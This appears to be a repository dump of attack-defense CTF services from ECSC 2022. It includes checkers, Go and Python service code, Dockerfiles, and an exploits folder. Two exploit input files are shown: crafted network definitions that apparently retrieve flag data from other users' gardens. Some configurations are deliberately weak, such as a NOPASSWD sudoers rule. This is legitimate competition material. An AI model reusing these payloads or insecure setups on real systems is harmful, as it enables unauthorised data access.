├── Dockerfile │ ├── checker.py │ ├── docker-compose.yaml │ └── requirements.txt └── checker2 │ ├── Dockerfile │ ├── checker.py │ ├── checksum.f │ ├── docker-compose.yaml │ ├── requirements.txt │ └── test_checker_local.py ├── dist ├── Dockerfile ├── README.md ├── cleanup-cron ├── docker-compose.yaml ├── run.sh └── src │ ├── CMakeLists.txt │ ├── deps │ └── fortran-unix │ │ ├── .gitignore │ │ ├── LICENCE │ │ ├── Makefile │ │ ├── README.md │ │ ├── examples │ │ ├── dirent │ │ │ └── dirent.f90 │ │ ├── fifo │ │ │ └── fifo.f90 │ │ ├── fork │ │ │ └── fork.f90 │ │ ├── irc │ │ │ └── irc.f90 │ │ ├── mqueue │ │ │ └── mqueue.f90 │ │ ├── msg │ │ │ └── msg.f90 │ │ ├── mutex │ │ │ └── mutex.f90 │ │ ├── os │ │ │ └── os.F90 │ │ ├── pid │ │ │ └── pid.f90 │ │ ├── pipe │ │ │ └── pipe.f90 │ │ ├── pthread │ │ │ └── pthread.f90 │ │ ├── regex │ │ │ └── regex.f90 │ │ ├── semaphore │ │ │ └── semaphore.f90 │ │ ├── serial │ │ │ └── serial.f90 │ │ ├── signal │ │ │ └── signal.f90 │ │ ├── socket │ │ │ └── socket.f90 │ │ ├── time │ │ │ └── time.f90 │ │ ├── uname │ │ │ └── uname.f90 │ │ └── uptime │ │ │ └── uptime.f90 │ │ ├── fpm.toml │ │ └── src │ │ ├── unix.F90 │ │ ├── unix_dirent.F90 │ │ ├── unix_errno.F90 │ │ ├── unix_fcntl.F90 │ │ ├── unix_inet.F90 │ │ ├── unix_ioctl.F90 │ │ ├── unix_ipc.F90 │ │ ├── unix_macro.c │ │ ├── unix_mqueue.F90 │ │ ├── unix_msg.F90 │ │ ├── unix_netdb.F90 │ │ ├── unix_pthread.F90 │ │ ├── unix_regex.F90 │ │ ├── unix_semaphore.F90 │ │ ├── unix_signal.F90 │ │ ├── unix_socket.F90 │ │ ├── unix_stat.F90 │ │ ├── unix_stdio.F90 │ │ ├── unix_stdlib.F90 │ │ ├── unix_string.F90 │ │ ├── unix_syslog.F90 │ │ ├── unix_termios.F90 │ │ ├── unix_time.F90 │ │ ├── unix_types.F90 │ │ ├── unix_unistd.F90 │ │ ├── unix_utsname.F90 │ │ └── unix_wait.F90 │ ├── main.f │ ├── mod_bucket.f │ ├── mod_consumption.f │ ├── mod_crypto.f │ ├── mod_turbine.f │ └── mod_user.f ├── exploits ├── exploit1.py ├── exploit2.py ├── exploit2_checksum.f ├── exploit3.py └── winds_of_the_past.py ├── meta.env └── 
winds_of_the_past.png /aquaeductus/checkers/checker1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY checker.py /checker/checker.py 10 | COPY Network.py /checker/Network.py 11 | COPY WeatherReport.py /checker/WeatherReport.py 12 | USER ctf-checkermaster 13 | ENV CTF_CHECKERSCRIPT /checker/checker.py 14 | 15 | # set this to _checker 16 | ENV CTF_SERVICE aquaeductus_checker1 17 | -------------------------------------------------------------------------------- /aquaeductus/checkers/checker1/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker1`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 
28 | ``` 29 | -------------------------------------------------------------------------------- /aquaeductus/checkers/checker1/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | services: 7 | checker: 8 | build: . 9 | command: localhost 1 ${TICK} # ip, team, tick 10 | # note that your service should be able to handle domain names and IP addresses 11 | network_mode: host 12 | volumes: 13 | - checkerstate:/tmp 14 | -------------------------------------------------------------------------------- /aquaeductus/checkers/checker1/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | numpy -------------------------------------------------------------------------------- /aquaeductus/checkers/checker2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY checker.py /checker/checker.py 10 | USER ctf-checkermaster 11 | ENV CTF_CHECKERSCRIPT /checker/checker.py 12 | 13 | # set this to _checker 14 | ENV CTF_SERVICE aquaeductus_checker2 15 | -------------------------------------------------------------------------------- /aquaeductus/checkers/checker2/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker2`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To 
test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 28 | ``` 29 | -------------------------------------------------------------------------------- /aquaeductus/checkers/checker2/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | services: 7 | checker: 8 | build: . 9 | command: localhost 1 ${TICK} # ip, team, tick 10 | # note that your service should be able to handle domain names and IP addresses 11 | network_mode: host 12 | volumes: 13 | - checkerstate:/tmp 14 | -------------------------------------------------------------------------------- /aquaeductus/checkers/checker2/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | numpy 3 | beautifulsoup4 4 | -------------------------------------------------------------------------------- /aquaeductus/dist/README.md: -------------------------------------------------------------------------------- 1 | # Aquaeductus 2 | 3 | ## Flag IDs 4 | 5 | - Flagstore 1: `XXXXXXXX:YYYYYYYY`, flag is in gardens `XXXXXXXX` and `YYYYYYYY` (same flag in both gardens) 6 | - Flagstore 2: `XXXXXXXX`, flag is in garden `XXXXXXXX` 7 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/controllers/index.go: -------------------------------------------------------------------------------- 1 | package controllers 2 | 3 | import ( 4 | "net/http" 5 | 6 | "github.com/gin-gonic/gin" 7 | "gorm.io/gorm" 8 | ) 9 | 10 | type
IndexController struct { 11 | db *gorm.DB 12 | } 13 | /* NewIndexController returns a controller holding the given gorm handle. */ 14 | func NewIndexController(db *gorm.DB) *IndexController { 15 | return &IndexController{db: db} 16 | } 17 | /* Index renders the "index" template with HTTP 200 and the title "Index"; it does not read c.db. */ 18 | func (c *IndexController) Index(ctx *gin.Context) { 19 | ctx.HTML(http.StatusOK, "index", gin.H{ 20 | "title": "Index", 21 | }) 22 | } 23 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/middlewares/errors.go: -------------------------------------------------------------------------------- 1 | package middlewares 2 | 3 | import ( 4 | "github.com/gin-gonic/gin" 5 | "github.com/rs/zerolog/log" 6 | ) 7 | /* ErrorLogging returns a gin middleware that lets the rest of the handler chain run (c.Next) and then logs each error recorded in c.Errors through zerolog. */ 8 | func ErrorLogging() gin.HandlerFunc { 9 | return func(c *gin.Context) { 10 | c.Next() 11 | 12 | for _, e := range c.Errors { 13 | log.Error().Err(e).Send() 14 | } 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/middlewares/session.go: -------------------------------------------------------------------------------- 1 | package middlewares 2 | 3 | import ( 4 | "net/http" 5 | 6 | "github.com/gin-contrib/sessions" 7 | "github.com/gin-contrib/sessions/cookie" 8 | "github.com/gin-gonic/gin" 9 | ) 10 | /* Session returns the gin session middleware for a cookie named "session", backed by a cookie store built from authKey and encryptKey; with this store the session data travels in the cookie itself, so both keys must stay secret. */ 11 | func Session(authKey, encryptKey []byte) gin.HandlerFunc { 12 | store := cookie.NewStore(authKey, encryptKey) 13 | /* Cookie lifetime is 24h (MaxAge is in seconds). HttpOnly hides the cookie from page scripts and SameSite=Strict keeps it off cross-site requests. NOTE(review): Secure is not set, so the browser will also send this cookie over plain HTTP; set Secure: true wherever the service is reached over TLS. */ 14 | store.Options(sessions.Options{ 15 | MaxAge: 24 * 60 * 60, 16 | HttpOnly: true, 17 | SameSite: http.SameSiteStrictMode, 18 | }) 19 | 20 | return sessions.Sessions("session", store) 21 | } 22 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/models/config.go: -------------------------------------------------------------------------------- 1 | package models 2 | /* Config is one key/value row: Key is the varchar(255) primary key, Value a non-null varbinary(255). NOTE(review): secretGetOrInit in secrets.go fills Value from its initializer, so this table presumably holds secret material in the clear - confirm, and restrict database access accordingly. */ 3 | type Config struct { 4 | Key string `gorm:"type:varchar(255);primarykey"` 5 | Value []byte `gorm:"type:varbinary(255);not null"` 6 | } 7 | --------------------------------------------------------------------------------
/aquaeductus/dist/src/models/user.go: -------------------------------------------------------------------------------- 1 | package models 2 | 3 | import ( 4 | "time" 5 | ) 6 | 7 | type User struct { 8 | ID uint `gorm:"primarykey"` 9 | Username string `gorm:"type:varchar(255);not null;unique"` 10 | Password []byte `gorm:"type:varbinary(255);not null"` 11 | CreatedAt time.Time `gorm:"autoCreateTime:milli;type:timestamp;not null"` 12 | UpdatedAt time.Time `gorm:"autoUpdateTime:milli;type:timestamp;not null"` 13 | } 14 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/network/layers.go: -------------------------------------------------------------------------------- 1 | package network 2 | 3 | var layers = []Layer{ 4 | &PermutationLayer{}, 5 | &RandomLayer{}, 6 | } 7 | 8 | type Layer interface { 9 | LayerName() string 10 | } 11 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/network/permutation.go: -------------------------------------------------------------------------------- 1 | package network 2 | 3 | import ( 4 | "math/rand" 5 | ) 6 | 7 | type PermutationLayer struct { 8 | } 9 | 10 | func (l *PermutationLayer) LayerName() string { 11 | return "PermutationLayer" 12 | } 13 | 14 | func (l *PermutationLayer) Handle(input ...float64) []float64 { 15 | n := make([]float64, len(input)) 16 | copy(n, input) 17 | 18 | rand.Shuffle(len(n), func(i, j int) { n[i], n[j] = n[j], n[i] }) 19 | 20 | return n 21 | } 22 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/network/random.go: -------------------------------------------------------------------------------- 1 | package network 2 | 3 | import "math/rand" 4 | 5 | type RandomLayer struct { 6 | } 7 | 8 | func (l *RandomLayer) LayerName() string { 9 | return "RandomLayer" 10 | } 11 | 12 | func (l *RandomLayer) Handle(n int) []float64 { 13 | r := make([]float64, n) 
14 | 15 | for i := 0; i < n; i++ { 16 | r[i] = rand.Float64() 17 | } 18 | 19 | return r 20 | } 21 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/public/assets/aquaeductus.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/aquaeductus/dist/src/public/assets/aquaeductus.jpg -------------------------------------------------------------------------------- /aquaeductus/dist/src/public/assets/custom.css: -------------------------------------------------------------------------------- 1 | body { 2 | background: rgb(255,255,255); 3 | background: linear-gradient(332deg, rgba(255,255,255,1) 0%, rgba(182,246,238,1) 100%); 4 | } 5 | 6 | .image.is-1by1 img.img-front { 7 | width: 75%; 8 | height: auto; 9 | border: 10px solid #ffffff; 10 | box-shadow: 0px 0px 10px 0px #000000; 11 | margin: 5rem 5rem 1rem 1rem; 12 | } -------------------------------------------------------------------------------- /aquaeductus/dist/src/release.wasm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/aquaeductus/dist/src/release.wasm -------------------------------------------------------------------------------- /aquaeductus/dist/src/secrets.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "errors" 5 | 6 | "aquaeductus/models" 7 | "gorm.io/gorm" 8 | ) 9 | 10 | func secretGetOrInit(key string, initializer func() []byte) []byte { 11 | var config models.Config 12 | if result := Gorm.Where("`key` = ?", key).First(&config); result.Error != nil { 13 | if !errors.Is(result.Error, gorm.ErrRecordNotFound) { 14 | panic(result.Error) 15 | } 16 | 17 | config.Key = key 18 | config.Value = initializer() 19 | 20 | if result := 
Gorm.Create(&config); result.Error != nil { 21 | panic(result.Error) 22 | } 23 | } 24 | 25 | return config.Value 26 | } 27 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/views/desert.html: -------------------------------------------------------------------------------- 1 | {{define "desert"}} 2 | {{template "header" .}} 3 | 4 |
5 |
6 | 7 |

...

8 | 9 |
10 |
11 | 12 | {{template "footer" .}} 13 | {{end}} 14 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/views/footer.html: -------------------------------------------------------------------------------- 1 | {{define "footer"}} 2 | 3 | 4 |
5 |
6 |

7 | Save water, maximize growth. Powered by AI. 8 |

9 |
10 |
11 | 12 | {{end}} 13 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/views/header.html: -------------------------------------------------------------------------------- 1 | {{define "header"}} 2 | 3 | 4 | 5 | 6 | {{ .title }} - aquaeductus 7 | 8 | 9 | 10 | 11 | 12 |
13 | {{end}} 14 | -------------------------------------------------------------------------------- /aquaeductus/exploits/README.md: -------------------------------------------------------------------------------- 1 | Our exploit has no dependencies. It can be invoked as follows: 2 | 3 | ./exploit1 IP FLAG_ID 4 | -------------------------------------------------------------------------------- /aquaeductus/exploits/exploit2_2_network.txt: -------------------------------------------------------------------------------- 1 | InputLayer linear 2 | 6 3 | InputNode 1 4 | InputNode 2 5 | InputNode 3 6 | InputNode 4 7 | InputNode 5 8 | InputNode 6 9 | 10 | WeatherLayer linear 11 | 6 12 | InputNode 1 13 | InputNode 2 14 | InputNode 3 15 | InputNode 4 16 | InputNode 5 17 | InputNode 6 18 | Garden.Instructions 19 | -------------------------------------------------------------------------------- /aquaeductus/exploits/exploit2_3_network.txt: -------------------------------------------------------------------------------- 1 | InputLayer linear 2 | 2 3 | InputNode 0 4 | InputNode 0 5 | 6 | LocationLayer linear 7 | 2 8 | RetrievalNode Instructions 9 | RetrievalNode Longitude 10 | 11 | -------------------------------------------------------------------------------- /aquaeductus/exploits/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | hexdump 3 | -------------------------------------------------------------------------------- /aquaeductus/meta.env: -------------------------------------------------------------------------------- 1 | SERVICE_NAME=aquaeductus 2 | -------------------------------------------------------------------------------- /aquaeductus/wasm/.dockerignore: -------------------------------------------------------------------------------- 1 | node_modules/ 2 | -------------------------------------------------------------------------------- /aquaeductus/wasm/.gitignore: 
-------------------------------------------------------------------------------- 1 | node_modules/ 2 | build/ 3 | -------------------------------------------------------------------------------- /aquaeductus/wasm/.prettierrc.json: -------------------------------------------------------------------------------- 1 | { 2 | "tabWidth": 4, 3 | "semi": true, 4 | "singleQuote": true, 5 | "trailingComma": "es5" 6 | } 7 | -------------------------------------------------------------------------------- /aquaeductus/wasm/Dockerfile: -------------------------------------------------------------------------------- 1 | ########################################################################################################## 2 | # Builder 3 | ########################################################################################################## 4 | FROM node:16 AS builder 5 | 6 | RUN apt-get update \ 7 | && apt-get install -y \ 8 | build-essential \ 9 | && rm -rf /var/lib/apt/lists/* 10 | 11 | WORKDIR /app 12 | 13 | COPY package.json package.json 14 | COPY package-lock.json package-lock.json 15 | 16 | RUN npm ci 17 | 18 | COPY . . 
19 | 20 | RUN npm run asbuild:release 21 | -------------------------------------------------------------------------------- /aquaeductus/wasm/asconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "targets": { 3 | "debug": { 4 | "outFile": "build/debug.wasm", 5 | "textFile": "build/debug.wat", 6 | "sourceMap": true, 7 | "debug": true, 8 | "optimize": false 9 | }, 10 | "release": { 11 | "outFile": "build/release.wasm", 12 | "textFile": "build/release.wat", 13 | "optimize": true, 14 | "optimizeLevel": 3, 15 | "shrinkLevel": 1, 16 | "converge": true, 17 | "noAssert": true 18 | } 19 | }, 20 | "options": { 21 | "bindings": "esm", 22 | "runtime": "stub" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /aquaeductus/wasm/assembly/rpc.ts: -------------------------------------------------------------------------------- 1 | export declare function instantiate(pck: string, struct: string): i64; 2 | export declare function invoke( 3 | handler: i64, 4 | method: string, 5 | parameters: string 6 | ): string; 7 | export declare function retrieve( 8 | handler: i64, 9 | prop: string 10 | ): string; 11 | -------------------------------------------------------------------------------- /aquaeductus/wasm/assembly/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "extends": "assemblyscript/std/assembly.json", 3 | "include": ["./**/*.ts"] 4 | } 5 | -------------------------------------------------------------------------------- /aquaeductus/wasm/build.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | set -e 3 | 4 | rm -rf build 5 | 6 | docker build -t ecsc2022-aquaeductus-wasm:latest . 7 | 8 | CONTAINER_ID=$(docker create ecsc2022-aquaeductus-wasm:latest) 9 | docker cp $CONTAINER_ID:/app/build . 
10 | docker rm $CONTAINER_ID 11 | -------------------------------------------------------------------------------- /aquaeductus/wasm/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "private": true, 3 | "type": "module", 4 | "exports": { 5 | ".": { 6 | "import": "./build/release.js", 7 | "types": "./build/release.d.ts" 8 | } 9 | }, 10 | "scripts": { 11 | "lint": "prettier --check ./assembly", 12 | "lint:fix": "prettier --write ./assembly", 13 | "asbuild:debug": "asc assembly/index.ts --target debug", 14 | "asbuild:release": "asc assembly/index.ts --target release", 15 | "asbuild": "npm run asbuild:debug && npm run asbuild:release", 16 | "start": "npx serve ." 17 | }, 18 | "dependencies": { 19 | "assemblyscript": "^0.21.2", 20 | "assemblyscript-regex": "^1.6.4" 21 | }, 22 | "devDependencies": { 23 | "prettier": "2.7.1" 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /blinkygram/.clang-format: -------------------------------------------------------------------------------- 1 | UseTab: ForIndentation 2 | TabWidth: 4 3 | IndentWidth: 4 4 | 5 | BreakBeforeBraces: Custom 6 | BraceWrapping: 7 | AfterFunction: true 8 | 9 | AllowShortFunctionsOnASingleLine: false -------------------------------------------------------------------------------- /blinkygram/blinkygram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/blinkygram/blinkygram.png -------------------------------------------------------------------------------- /blinkygram/checkers/README.md: -------------------------------------------------------------------------------- 1 | # Checkers 2 | 3 | ## Checker 1 4 | 5 | Backup flagstore and server checks. 6 | 7 | ## Checker 2 8 | 9 | Market flagstore and market bot checks. 
10 | -------------------------------------------------------------------------------- /blinkygram/checkers/checker1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY *.py /checker/ 10 | USER ctf-checkermaster 11 | ENV CTF_CHECKERSCRIPT /checker/checker.py 12 | 13 | ENV CTF_SERVICE blinkygram_checker1 14 | -------------------------------------------------------------------------------- /blinkygram/checkers/checker1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | services: 7 | checker: 8 | build: . 9 | command: localhost 1 ${TICK} 10 | network_mode: host 11 | volumes: 12 | - checkerstate:/tmp 13 | -------------------------------------------------------------------------------- /blinkygram/checkers/checker1/requirements.txt: -------------------------------------------------------------------------------- 1 | ecdsa 2 | -------------------------------------------------------------------------------- /blinkygram/checkers/checker2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY *.py /checker/ 10 | USER ctf-checkermaster 11 | ENV CTF_CHECKERSCRIPT /checker/checker.py 12 | 13 | ENV CTF_SERVICE blinkygram_checker2 14 | -------------------------------------------------------------------------------- /blinkygram/checkers/checker2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | 
checkerstate: 5 | 6 | services: 7 | checker: 8 | build: . 9 | command: localhost 1 ${TICK} 10 | network_mode: host 11 | volumes: 12 | - checkerstate:/tmp 13 | -------------------------------------------------------------------------------- /blinkygram/checkers/checker2/requirements.txt: -------------------------------------------------------------------------------- 1 | ecdsa 2 | -------------------------------------------------------------------------------- /blinkygram/dist/README.md: -------------------------------------------------------------------------------- 1 | # blinkygram 2 | 3 | ## Flag IDs 4 | 5 | - Flagstore 1: `backup:XXX/YYY`, flag is in backup with ID `YYY` of user with ID `XXX` 6 | - Flagstore 2: `item:XXX`, flag is content of market item with ID `XXX` 7 | -------------------------------------------------------------------------------- /blinkygram/dist/bot/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 2 | 3 | RUN apt-get update && apt-get install -y libssl1.1 4 | 5 | RUN useradd bot 6 | 7 | WORKDIR /app 8 | 9 | RUN mkdir /app/storage && chmod 777 /app/storage 10 | 11 | COPY ./bot ./ 12 | RUN chmod +x ./bot 13 | 14 | USER bot 15 | 16 | ENTRYPOINT ["./bot"] 17 | -------------------------------------------------------------------------------- /blinkygram/dist/bot/bot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/blinkygram/dist/bot/bot -------------------------------------------------------------------------------- /blinkygram/dist/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | bot-storage: 5 | server-storage: 6 | 7 | services: 8 | blinkygram-bot: 9 | read_only: true 10 | build: ./bot 11 | restart: unless-stopped 12 | volumes: 13 | - bot-storage:/app/storage 14 
| environment: 15 | - BOT_SERVER_HOST=blinkygram-server 16 | - BOT_SERVER_PORT=10050 17 | - BOT_WORKERS=32 18 | depends_on: 19 | - blinkygram-server 20 | links: 21 | - blinkygram-server 22 | blinkygram-server: 23 | read_only: true 24 | tmpfs: 25 | - /tmp 26 | build: ./server 27 | restart: unless-stopped 28 | volumes: 29 | - server-storage:/app/storage 30 | environment: 31 | - SERVER_BIND_HOST=0.0.0.0 32 | - SERVER_BIND_PORT=10050 33 | - SERVER_WORKERS=1 34 | - SERVER_THROTTLE_RPS=10 35 | ports: 36 | - '0.0.0.0:10050:10050' 37 | -------------------------------------------------------------------------------- /blinkygram/dist/server/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN apt-get update && apt-get install -y zip sudo 4 | 5 | RUN useradd server && useradd userbackup 6 | RUN echo 'server ALL=(userbackup:userbackup) NOPASSWD: ALL' >> /etc/sudoers 7 | 8 | WORKDIR /app 9 | 10 | RUN mkdir /app/storage && chmod 777 /app/storage 11 | 12 | COPY requirements.txt ./ 13 | RUN pip install -r requirements.txt 14 | 15 | COPY *.py ./ 16 | 17 | USER server 18 | 19 | ENTRYPOINT ["./main.py"] 20 | -------------------------------------------------------------------------------- /blinkygram/dist/server/globals.py: -------------------------------------------------------------------------------- 1 | import dataclasses 2 | 3 | from auth import Authenticator 4 | from database import Database 5 | 6 | 7 | @dataclasses.dataclass 8 | class Globals: 9 | backup_path: str = None 10 | auth: Authenticator = None 11 | db: Database = None 12 | 13 | 14 | G = Globals() 15 | -------------------------------------------------------------------------------- /blinkygram/dist/server/requirements.txt: -------------------------------------------------------------------------------- 1 | aiosqlite 2 | ecdsa 3 | -------------------------------------------------------------------------------- /blinkygram/dist/server/utils.py: 
-------------------------------------------------------------------------------- 1 | import os 2 | import grp 3 | import pwd 4 | 5 | from functools import lru_cache 6 | 7 | 8 | USER_BACKUP = 'userbackup' 9 | USER_SERVER = 'server' 10 | 11 | 12 | @lru_cache 13 | def get_uid(username) -> int: 14 | passwd = pwd.getpwnam(username) 15 | return passwd.pw_uid 16 | 17 | 18 | @lru_cache 19 | def get_gid(name) -> int: 20 | group = grp.getgrnam(name) 21 | return group.gr_gid 22 | 23 | 24 | def set_perms(path, owner, group, mode): 25 | uid = get_uid(owner) 26 | gid = get_gid(group) 27 | os.chown(path, uid, gid) 28 | os.chmod(path, mode) 29 | 30 | 31 | def set_perms_server(path): 32 | mode = 0o770 if os.path.isdir(path) else 0o660 33 | set_perms(path, USER_SERVER, USER_SERVER, mode) 34 | -------------------------------------------------------------------------------- /blinkygram/exploits/README.md: -------------------------------------------------------------------------------- 1 | # Exploits 2 | 3 | The exploits are `exploitN.py`, where `N` is the vulnerability number (see main README). 4 | The other files are helper modules. 5 | See `requirements.txt` for Python dependencies. 
6 | 7 | Invoke as: 8 | 9 | ``` 10 | $ ./exploitN.py 11 | ``` 12 | -------------------------------------------------------------------------------- /blinkygram/exploits/requirements.txt: -------------------------------------------------------------------------------- 1 | ecdsa 2 | -------------------------------------------------------------------------------- /blinkygram/meta.env: -------------------------------------------------------------------------------- 1 | SERVICE_NAME=blinkygram 2 | -------------------------------------------------------------------------------- /blinkygram/src/.gitignore: -------------------------------------------------------------------------------- 1 | # Build outputs 2 | /out/ 3 | -------------------------------------------------------------------------------- /blinkygram/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 2 | 3 | RUN apt-get update && apt-get install -y build-essential libssl-dev 4 | 5 | ENTRYPOINT ["make", "-C", "/buildroot/src"] 6 | -------------------------------------------------------------------------------- /blinkygram/src/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | sudo docker build -t ecsc22-service-5-builder . && \ 4 | sudo docker run --rm \ 5 | --user "$(id -u):$(id -g)" \ 6 | -v "$PWD/../":/buildroot \ 7 | ecsc22-service-5-builder "$@" 8 | -------------------------------------------------------------------------------- /blinkygram/src/src/bot/chat.h: -------------------------------------------------------------------------------- 1 | #ifndef CHAT_H 2 | #define CHAT_H 3 | 4 | #include 5 | 6 | #include "bot.h" 7 | 8 | /** 9 | * A bot_chat_callback that implements the bot's logic. 
10 | */ 11 | bool chat_callback(struct bot *bot, const struct bot_chat_msg *msg); 12 | 13 | #endif 14 | -------------------------------------------------------------------------------- /blinkygram/src/src/dist/README.md: -------------------------------------------------------------------------------- 1 | # blinkygram 2 | 3 | ## Flag IDs 4 | 5 | - Flagstore 1: `backup:XXX/YYY`, flag is in backup with ID `YYY` of user with ID `XXX` 6 | - Flagstore 2: `item:XXX`, flag is content of market item with ID `XXX` 7 | -------------------------------------------------------------------------------- /blinkygram/src/src/docker/Dockerfile.bot: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 2 | 3 | RUN apt-get update && apt-get install -y libssl1.1 4 | 5 | RUN useradd bot 6 | 7 | WORKDIR /app 8 | 9 | RUN mkdir /app/storage && chmod 777 /app/storage 10 | 11 | COPY ./bot ./ 12 | RUN chmod +x ./bot 13 | 14 | USER bot 15 | 16 | ENTRYPOINT ["./bot"] 17 | -------------------------------------------------------------------------------- /blinkygram/src/src/docker/Dockerfile.server: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN apt-get update && apt-get install -y zip sudo 4 | 5 | RUN useradd server && useradd userbackup 6 | RUN echo 'server ALL=(userbackup:userbackup) NOPASSWD: ALL' >> /etc/sudoers 7 | 8 | WORKDIR /app 9 | 10 | RUN mkdir /app/storage && chmod 777 /app/storage 11 | 12 | COPY requirements.txt ./ 13 | RUN pip install -r requirements.txt 14 | 15 | COPY *.py ./ 16 | 17 | USER server 18 | 19 | ENTRYPOINT ["./main.py"] 20 | -------------------------------------------------------------------------------- /blinkygram/src/src/server/globals.py: -------------------------------------------------------------------------------- 1 | import dataclasses 2 | 3 | from auth import Authenticator 4 | from database import Database 5 | 6 | 7 | @dataclasses.dataclass 8 | 
class Globals: 9 | backup_path: str = None 10 | auth: Authenticator = None 11 | db: Database = None 12 | 13 | 14 | G = Globals() 15 | -------------------------------------------------------------------------------- /blinkygram/src/src/server/requirements.txt: -------------------------------------------------------------------------------- 1 | aiosqlite 2 | ecdsa 3 | -------------------------------------------------------------------------------- /blinkygram/src/src/server/utils.py: --------------------------------------------------------------------------------
import os
import grp
import pwd

from functools import lru_cache


# Account names used for ownership changes; Dockerfile.server on this page
# creates both with `useradd`.
USER_BACKUP = 'userbackup'
USER_SERVER = 'server'


@lru_cache
def get_uid(username: str) -> int:
    """Return the numeric user id of *username* from the passwd database.

    The result is memoized by ``lru_cache``, so each name is looked up once
    per process. ``pwd.getpwnam`` raises ``KeyError`` for an unknown account.
    """
    passwd = pwd.getpwnam(username)
